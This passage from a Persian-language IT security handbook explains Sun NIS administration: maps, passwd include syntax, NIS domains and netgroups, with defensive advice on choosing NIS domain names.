ﻣﺮﻛﺰﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺫﺧﻴﺮﻩ ﺷﻮﺩ .ﺑﺪﻟﻴﻞ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳﺖ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﺯﻣﺎﻧﻴﻜـﻪ ﻛـﺎﺭﺑﺮ
ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ ،ﻫﻮﻳﺘﺶ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺮﻛـﺰﻱ ﻭ ﺑـﺪﻭﻥ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﺭﻭﻱ
ﺷﺒﻜﺔ ﻧﺎﻣﻄﻤﺌﻦ ﺗﺼﺪﻳﻖ ﻣﻲﺷﻮﺩ .ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ -ﻣﺜﻞ ،Kerberos ،NIS+ ،NISﻭ - LDAPﺍﺭﺍﺋﻪ ﺷﺪﻩ ،ﺍﻣـﺎ
ﻫﻴﭽﻴﻚ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭ ﺑﺼﻮﺭﺕ ﻗﻄﻌﻲ ﭘﺬﻳﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧﺪ NIS .ﻭ NIS+ﺍﺑﺘﺪﺍ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻳﻲ ﺑـﺎ ﭼﻨـﺪﻳﻦ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ Unix
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻧﺪ؛ ﻭ Kerberosﻭ LDAPﻧﻴﺰ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﺤﻴﻄﻬﺎ ﻗﺴﻤﺖ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ Windows NT
ﺭﺍ ﺗﺸﮑﻴﻞ ﻣﻲﺩﻫﻨﺪ.
٣٢٩
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪﺍﻱ SUN
١٥٣
ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﻭ ﻣﺸﻬﻮﺭﺗﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺗﻮﺯﻳﻊﺷﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ،ﺧـﺪﻣﺎﺕ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪﺍﻱ )(NIS
ﺍﺳﺖ .ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ NIS+ﻋﺮﺿﻪ ﺷﺪ ،ﻛﻪ ﻧﻮﻉ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪ ﻭ ﺍﻟﺒﺘﻪ ﭘﻴﭽﻴﺪﻩﺗﺮ NISﺍﺳﺖ .ﻛﻤﻲ ﺍﺧﻴﺮﺗﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ LDAP
)ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ( ١٥٤ﻣﺤﺒﻮﺑﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ ،ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﻛﺎﺭﺑﺮﺍﻥ Sunﺑﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ ﺑـﺮ LDAPﺭﻭﻱ
ﻣﻲﺁﻭﺭﻧﺪ .ﺑﺎ ﺍﻳﻨﻜﻪ Sunﺑﺪﻻﻳﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺧﻮﺍﺳﺖ ﮐﻪ ﺍﺯ NISﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨـﺪ ،ﺍﻣـﺎ ﻫﻨـﻮﺯ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬـﺎ ﺍﺯ ﺁﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
ﺷـﺮﻛﺖ Sun
NISﻳﻚ ﺳﻴﺴﺘﻢ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ،ﻓﺎﻳﻠﻬﺎﻱ ﮔﺮﻭﻩ ،ﺟـﺪﺍﻭﻝ
ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﻫﺮﭼﻨﺪ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺗﻨﻬﺎ ﺩﺭ
ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ NISﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﺭﻭﻱ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﻭﻡ ﺗﻜـﺮﺍﺭ ﺷـﺪﻩ ﺍﺳـﺖ(.
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺷﺒﻜﻪ -ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ - NISﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ
ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ( ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻛﻪ ﮔﻮﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﺍﺳـﺖ .ﺍﻳـﻦ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﻩ ﻧﮕﺎﺷـﺘﻬﺎﻱ
١٥٥NISﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NISﻳﻚ ﺷﺒﻜﺔ ﺑﺰﺭﮒ ﺁﺳﺎﻧﺘﺮ ﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﺩ ،ﭼﻮﻥ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺫﺧﻴـﺮﻩ
ﻣﻲﺷﻮﺩ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺭﻭﻱ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻧﮕﺎﺷﺘﻬﺎﻱ NISﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺘﻨﺎﻇﺮ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺸﺎﻥ ﺍﻓﺰﻭﺩﻩ ﻣﻲﮔﺮﺩﺩ .ﺩﺭ ﻣﻮﺭﺩ
ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ NISﺍﺯ ﻋﻼﻣﺖ ﺟﻤﻊ ) (+ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺗﻮﻗﻒ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺍﻧﺪﻥ ﻓﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ )ﻣﺜ ﹰﻼ (/etc/passwdﻭ ﺳـﭙﺲ
ﻻ ﭼﻨﺪﻳﻦ ﻧﮕﺎﺷﺖ
ﭘﺮﺱ ﻭ ﺟﻮ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NISﺭﺍ ﺍﺯ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻨﺎﺳﺐ ) NISﻣﺜﻞ (passwdﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻌﻤﻮ ﹰ
ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻳﻜﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺷﺎﺧﺔ /etcﻣﺜﻞ ،/etc/hosts ،/etc/passwdﻭ /etc/servicesﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﻓﺎﻳﻞ /etc/passwdﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﺻﻮﺭﺕ ﺩﻳﺪﻩ ﺷﻮﺩ:
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+:: 999:999:::
NISﻫﻤﭽﻨﻴﻦ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﺑﻌﻀﻲ ﺩﺍﻣﻨـﻪﻫـﺎ ﺭﺍ ﺍﺯ ﺑﺮﺧـﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﺓ /etc/passwdﻭﺍﺭﺩ ﻛﻨﻴـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﺍﮔﺮ ﺩﺍﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ /etc/passwdﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ:
root:si4NOjF9Q8JpE:0:Mr. Root:/:/bin/sh
+::999:999:::
ﺁﻧﮕﺎﻩ ﻛﻠﻴﺔ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧﮕﺎﺷﺖ passwdﻣﺮﺑﻮﻁ ﺑﻪ NISﻭﺍﺭﺩ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ،ﺍﻣﺎ ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ ﺩﺍﺩﺓ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻛﻪ ﺑﺎ "*" ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻩ ﻭ ﺍﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺁﻥ ﺩﺭ ﻣﺎﺷﻴﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨـﺪ .ﻫﻤـﺔ UIDﻫـﺎ ﻭ
153 Network Information Service
154 Lightweight Directory Access Protocol
155 NIS Maps
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺮﻧﺎﻣﻪ ،ﻓﺎﻳﻞ /etc/passwdﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺨﻮﺍﻧﺪ ﺗـﺎ ﻳـﻚ ﺩﺭﺧﻮﺍﺳـﺖ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻩﺷـﺪﻥ
ﻻ ﻧﮕﺎﺷﺖ passwdﺍﺯ ﻓﺎﻳﻞ /etc/passwdﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺳـﺎﺧﺘﻪ
ﻧﮕﺎﺷﺖ passwdﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﻳﺠﺎﺩ ﻛﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﻣﻲﺷﻮﺩ ،ﻫﺮﭼﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﻧﻴﺴﺖ .ﻭﻗﺘﻲ NISﻓﺎﻳﻞ /etc/passwdﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ،ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻭﻟﻴﻦ ﺧﻂ ﻗﺎﺑﻞ ﺗﻄﺒﻴﻖ ﺑﺮﺳـﺪ
ﻛﺎﺭ ﺭﺍ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﻛﺮﺩ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻤﻠﻴﺎﺕ ﺩﺭﻳﺎﻓﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺎ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺑﻪ ﺑﻌﺪ ﺍﺯ ﻋﻼﻣﺖ " "+ﺑﻪ
ﺗﻌﺪﺍﺩ ﺧﺎﺻﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺎ ﮔﺬﺍﺷﺘﻦ ﺧﻄﻲ ﻛـﻪ ﺑـﺎ ﻋﻼﻣـﺖ ﺗﻔﺮﻳـﻖ )(-
ﺷﺮﻭﻉ ﻣﻲﺷﻮﺩ ﺍﺯ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻥ ﻣﺴﺘﺜﻨﻲ ﻛﻨﻴﺪ.
٣٣٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺮﺩﺍﺭﻳﺪ ،ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻓﺎﻳﻞ ،ﻣﺎﻟﻜﺎﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺭﺍ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ.
ﺍﻳﻦ ﺩﺍﺩﻩ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ~userﺩﺭ ﭘﻮﺳﺘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺑﺪﺭﺳﺘﻲ ﺷﺎﺧﺔ ﺧﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺭﺍ ﻧﮕﺎﺷﺖ ﻛﻨﻨﺪ )ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺁﻥ ﺷـﺎﺧﻪ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ mount ،NFSﺷﺪﻩ ﺍﺳﺖ(.
ﺩﺍﻣﻨﻪﻫﺎﻱ NIS
ﻭﻗﺘﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ NISﺭﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻴﺪ ﺑﺎﻳﺪ ﻳﻚ ﺩﺍﻣﻨﺔ NIS
١٥٦
ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﺩﺍﻣﻨﻪﻫﺎ ﻣﺸﺎﺑﻪ ﺩﺍﻣﻨﻪﻫـﺎﻱ DNS
ﻧﻴﺴﺘﻨﺪ .ﺩﺍﻣﻨﻪﻫﺎﻱ DNSﻳﻚ ﻣﻨﻄﻘﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺍﻣﻨﻪﻫﺎﻱ NISﻳﻚ ﮔﺮﻭﻩ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﻣﻌـﻴﻦ
ﻣﻲﻧﻤﺎﻳﻨﺪ .ﻓﺮﻣﺎﻥ domainnameﺩﺭ Unixﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﻭ ﺗﻐﻴﻴﺮ ﻧﺎﻡ ﻳﻚ ﺩﺍﻣﻨﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ .ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻥ ﺗﻨﻬـﺎ
ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻳﻚ ﺩﺍﻣﻨﺔ NISﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻫﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺩﺍﻣﻨﻪﻫﺎﻱ NISﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﺪ.
ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﺩﺍﻣﻨﺔ "ﮔﺮﻭﻩ ﺷﺒﻜﻪ" ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ .ﺗﻨﻈﻴﻢ ﺍﻳﻦ ﺩﻭ ﺩﺍﻣﻨﻪ ﺑﻪ ﻳﻚ ﻧﺎ ﹺﻡ ﻣـﺸﺎﺑﻪ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﻧﮕﺎﺭﺷـﻬﺎﻱ
sendmailﺑﺎﻋﺚ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺗﻲ ﺷﺪﻩ ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺩﺍﻣﻨﺔ NISﻛﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺣـﺪﺱ ﺯﺩﻩ ﻣـﻲﺷـﻮﺩ ﻣﺨـﺎﻃﺮﺍﺕ
ﺍﻣﻨﻴﺘﻲ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ .ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﻪ ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﻧﻘﺎﻳﺺ NISﻭ NFSﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﻨـﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻫﻤﻴـﺸﻪ ﻗﺒـﻞ ﺍﺯ ﻫـﺮ
ﺍﻧﺠﺎﻡ ﻫﺮ ﺗﻼﺷﻲ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻌﻨﻮﺍﻥ ﻧﺎﻡ ﺩﺍﻣﻨﻪ NISﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ) .ﺍﻟﺒﺘﻪ ﻧﺎﻡ ﺩﺍﻣﻨﻪ NISﻛﻤﺎﻛـﺎﻥ
ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺗﻌﻴﻴﻦ ﺍﺳﺖ(.
ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ NIS
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪﺍﻱ ١٥٧NISﻣﻲﺗﻮﺍﻧﻴﺪ ﮔﺮﻭﻫﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ .ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ
ﺍﺻﻞ ﺷﺒﻴﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻣﺤﻠﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻧﻬﺎ.
ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ﺳﺎﺩﻩﺳﺎﺯﻱ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺍﺷﺘﺒﺎﻩ ﺍﺳﺖ .ﺑـﺎ ﻣـﺸﺨﺺ ﻛـﺮﺩﻥ ﻭ ﺍﺳـﺘﻔﺎﺩﺓ ﺻـﺤﻴﺢ ﺍﺯ
ﮔﺮﻭﻫﻬﺎﻱ ﺷﺒﻜﻪ ،ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺍﻓﺮﺍﺩ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﺍﺩ.
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﮔﺮﻭﻩ ﺷﺒﻜﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ NISﺩﺭ ﻓﺎﻳﻞ /usr/etc/netgroupﻳﺎ /etc/netgroupﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ.
ﺍﻳﻦ ﻓﺎﻳﻞ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺧﻂ ﺩﺭ ﻗﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ:
… Groupname member1 member2
ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﻚ ﺩﺍﻣﻨﺔ NISﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ .ﻗﺎﻟﺐ ﺍﻋﻀﺎ ﭼﻨﻴﻦ ﺍﺳﺖ:
)(hostname, username, domainname
ﺍﮔﺮ ﺟﺎﻱ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ) (usernameﺧﺎﻟﻲ ﺑﺎﺷﺪ ،ﺁﻧﮕﺎﻩ ﻫﺮ ﻛﺎﺭﺑ ﹺﺮ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﻣﻴﺰﺑﺎﻥ ،ﻋﻀﻮﻱ ﺍﺯ ﮔﺮﻭﻩ ﺍﺳﺖ .ﺍﮔﺮ ﺟﺎﻱ ﻳﻚ ﻧﺎﻡ
١٥٨
ﺩﺍﻣﻨﻪ ) (domainnameﺧﺎﻟﻲ ﺑﺎﺷﺪ ،ﺁﻧﮕﺎﻩ ﺩﺍﻣﻨﺔ ﺟﺎﺭﻱ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ.
ﻧﺼﺐ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ
ﺑﺮﻧﺎﻣﺔ ) /etc/yp/makedbmﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺴﻴﺮ /usr/etc/yp/makedbmﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ( ﻓﺎﻳﻞ ﮔﺮﻭﻩ ﺷـﺒﻜﻪ ﺭﺍ ﺩﺭ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ
ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﻛﻪ ﺩﺭ ﻣﺴﻴﺮﻫﺎﻱ ﺯﻳﺮ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﺪ:
156 NIS Domain
157 NIS Netgroups
